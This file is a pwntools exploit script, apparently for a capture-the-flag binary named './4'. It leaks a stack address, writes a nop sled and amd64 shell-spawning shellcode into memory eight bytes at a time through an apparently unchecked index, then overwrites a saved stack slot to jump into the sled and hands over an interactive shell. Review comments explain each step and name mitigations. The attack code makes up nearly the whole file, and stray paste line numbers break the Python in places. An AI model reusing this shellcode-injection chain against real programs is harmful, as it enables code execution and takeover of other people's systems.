#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template
from pwn import *
from ctypes import *

# Target architecture for pwntools.  Assigning context.binary afterwards lets
# pwntools pick arch/bits/os up from the ELF itself; `exe` keeps the plain
# path string that start() launches.
context.arch = 'amd64'
exe = './4'
context.binary = exe
  11.  
# Many built-in settings can be controlled on the command-line and show up
# in "args".  For example, to dump all data sent/received, and disable ASLR
# for all created processes:
# ./exploit.py DEBUG NOASLR
  16.  
  17.  
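def start(argv=None, *a, **kw):
    """Start the exploit against the target.

    Launches ``exe`` under GDB when the script is run with the ``GDB``
    argument (``./exploit.py GDB``), otherwise as a plain ``process``.

    Args:
        argv: extra command-line arguments appended after ``exe``;
            ``None`` means no extra arguments.
        *a, **kw: passed straight through to ``gdb.debug`` / ``process``.

    Returns:
        The pwntools tube for the launched target.
    """
    # A mutable default (the template's ``argv=[]``) would be one list shared
    # by every call; build a fresh one instead.  ``None`` stays the public
    # default so positional callers are unaffected.
    if argv is None:
        argv = []
    # ``gdbscript`` is a module-level name defined below this function; it is
    # looked up at call time, so the ordering is fine.
    if args.GDB:
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    return process([exe] + argv, *a, **kw)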
  24.  
# Specify your GDB script here for debugging.
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
# Commands handed to GDB by start() when the script is run as
# ``./exploit.py GDB``.  The trailing format() call lets ``{name}``
# placeholders be filled from module-level names; none are used yet.
gdbscript = "\n".join((
    "",
    "continue",
    "",
)).format(**locals())
  31.  
#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================
  35.  
# NOTE(review): the whole sequence below is one fixed conversation with the
# target's menu; every send/recv depends on the previous one, so statement
# order must not change.  From a defender's point of view the script relies
# on two things: an address the program prints to its output (parsed into
# ``dataleak``), and a write path addressed by a user-supplied index that is
# apparently not bounds-checked (inferred from the indices 16.., 66 and -1
# sent below; the binary itself is not visible here).  Bounds-checking that
# index, not echoing addresses, and -- if, as the comment suggests, the leak
# is a stack address -- a non-executable stack would each break this chain.
io = start()

# Payload: 304 single-byte ``nop`` instructions followed by pwntools'
# amd64 shell-spawning shellcode.  The sled exists so that a landing point
# anywhere inside it still slides into the shellcode.
nopslide=asm(
    "nop\n"*304
)
shellcode = asm(shellcraft.amd64.sh())



#get stack addr
# Menu option 2, then "15" at the "read?" prompt; the number the target
# echoes between "for: " and "1)" is parsed as an integer.  int() accepts
# ASCII digits in bytes directly, so no decode() is needed -- but this
# assumes the target prints the value in decimal (TODO confirm).
io.recvuntil("Exit\n")
io.send(b"2\n")
io.recvuntil(b"read?")
io.send(b"15\n")
io.recvuntil("for: ")
dataleak=int(io.recvuntil(b"1)").split(b"1)")[0])


# Full payload that gets written into the target, 8 bytes at a time below.
p=nopslide+shellcode

print("dataleak: 0x%x"%dataleak)

# Menu option 1 with index -1 and an oversized value; the script does not
# say what this step achieves (presumably a preparatory write -- verify
# against the target before relying on it).
io.recvuntil(b"Exit\n")
io.send(b"1\n")
io.recvuntil("number\n")
io.send(b"-1\n")
io.recvuntil("number!\n")
io.send(b"99999999999999999\n")


# Write the payload one 8-byte word at a time via menu option 1, starting at
# index 16.  Only whole words are sent: any len(p) % 8 trailing bytes are
# silently dropped by the range() below.
for i in range(len(p)//8):
    io.recvuntil("Exit\n")
    io.sendline("1")
    io.recv()
    io.sendline(str(16+i))

    # The i-th 8-byte slice of the payload, read as a little-endian integer
    # (the byte order the target will see in memory on amd64).
    shellcode_part = p[0+8*i:i*8+8]
    shellcode_int = int.from_bytes(shellcode_part, byteorder='little')

    print(shellcode_part)
    print(str(shellcode_int))

    # The target appears to take a signed 64-bit decimal, so values above
    # INT64_MAX are reinterpreted as negative through ctypes.  c_long is
    # 64 bits on LP64 platforms (Linux/macOS) but 32 bits on Windows;
    # c_longlong or ``v - (1 << 64)`` would be the portable spelling.
    if(shellcode_int > 0x7fffffffffffffff):
        shellcode_int = (c_long(shellcode_int)).value

    io.sendline(str(shellcode_int))


#modify to enter the nopslide
# Aim 120 bytes below the leaked address so the jump lands inside the nop
# sled rather than exactly at its start (offset chosen by the author; not
# derivable from the script).
dataleak-=120

# Last write: index 66 (the author's annotation says "rbp + 1"; which slot
# that reaches is not visible from the script), with the adjusted leak as
# the value, then "0" to leave the menu.  Note the prompt is matched on
# "Exit" without a newline here, unlike the earlier calls.
io.recvuntil("Exit")
io.sendline("1")
io.recv()
io.sendline(str("66")) #rbp + 1
io.sendline(str(dataleak))
io.recv()
io.send("0\n")
#print("0x%x"%addr)
#io.send(padding+addr)
#io.send(nopslide+shellcode+b"\n")
# Hand the tube over to the user for interactive use.
io.interactive()